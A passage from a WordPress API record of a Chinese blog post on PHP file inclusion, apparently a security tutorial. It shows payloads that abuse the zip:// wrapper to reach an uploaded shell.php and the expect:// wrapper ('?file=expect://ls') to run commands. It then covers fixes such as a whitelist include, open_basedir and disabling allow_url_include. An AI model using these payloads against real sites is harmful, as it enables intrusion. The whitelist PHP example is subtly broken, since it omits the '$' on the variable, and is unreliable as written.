(zip\u5fc5\u987b\u662f\u7edd\u5bf9\u8def\u5f84)<\/code><br \/>\n\u8fd9\u6837zip:\/\/\u5c31\u4f1a\u5c06png\u5f53\u505azip\u538b\u7f29\u5305\u8fdb\u884c\u89e3\u538b\uff0c\u5e76\u4e14\u8bbf\u95ee\u89e3\u538b\u540e\u7684shell.php\u6587\u4ef6<\/p>\n<h2>expect:\/\/\u4f2a\u534f\u8bae<\/h2>\n<p>expect:\/\/\u4f2a\u534f\u8bae\u7528\u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u4f46\u662f\u9700\u8981\u5b89\u88c5\u62d3\u5c55<br \/>\n\u7528\u6cd5: <code>?file=expect:\/\/ls<\/code><\/p>\n<h1>\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4fee\u590d<\/h1>\n<h2>\u4ee3\u7801\u914d\u7f6e<\/h2>\n<p>\u53ef\u4ee5\u5728\u4ee3\u7801\u5c42\u5bf9\u6587\u4ef6\u5305\u542b\u8fdb\u884c\u8fc7\u6ee4\uff0c\u8bbe\u7f6e\u5305\u542b\u7684\u53c2\u6570\u7684\u767d\u540d\u5355\uff0c\u5047\u8bbe\u7f51\u7ad9\u53ea\u5305\u542b\u6587\u4ef6\u4e3aindex.php\u548cadmin.php<br \/>\n\u5c31\u53ef\u4ee5\u5b9a\u4e49\u597d\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $filename=$_GET[&#039;filename&#039;];\n    switch ($filename) {\n        case &#039;index&#039;:\n        case &#039;admin&#039;:\n            include(&#039;\/var\/www\/html\/&#039;.filename.&#039;.php&#039;);\n            break;\n        default:\n            break;\n    }\n?&gt;<\/code><\/pre>\n<h2>\u670d\u52a1\u5668\u914d\u7f6e<\/h2>\n<ul>\n<li>\u4fee\u6539PHP\u914d\u7f6e\u6587\u4ef6\uff0c\u5c06open_basedir\u7684\u503c\u8bbe\u7f6e\u4e3a\u53ef\u4ee5\u5305\u542b\u7684\u7279\u5b9a\u76ee\u5f55\uff0c\u540e\u9762\u8981\u52a0\/\uff0c\u4f8b\u5982open_basedir=\/var\/www\/html\/<\/li>\n<li>\u4fee\u6539PHP\u914d\u7f6e\u6587\u4ef6\uff0c\u5173\u95edallow_url_include<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u6587\u4ef6\u5305\u542b\u7684\u5b9a\u4e49 \u5982\u679c\u6587\u4ef6\u5305\u542b\u51fd\u6570\u6ca1\u6709\u7ecf\u8fc7\u4e25\u683c\u7684\u8fc7\u6ee4\u6216\u8005\u5b9a\u4e49 \u5e76\u4e14\u53c2\u6570\u53ef\u4ee5\u88ab\u7528\u6237\u63a7\u5236 \u8fd9\u6837\u5c31\u6709\u53ef\u80fd\u5305\u542b\u975e\u9884\u671f\u7684\u6587\u4ef6\u3002 \u5982\u679c\u6587\u4ef6\u4e2d\u5b58\u5728 &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-123","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=123"}],"version-history":[{"count":2,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/123\/revisions"}],"predecessor-version":[{"id":233,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/123\/revisions\/233"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=123"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=123"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}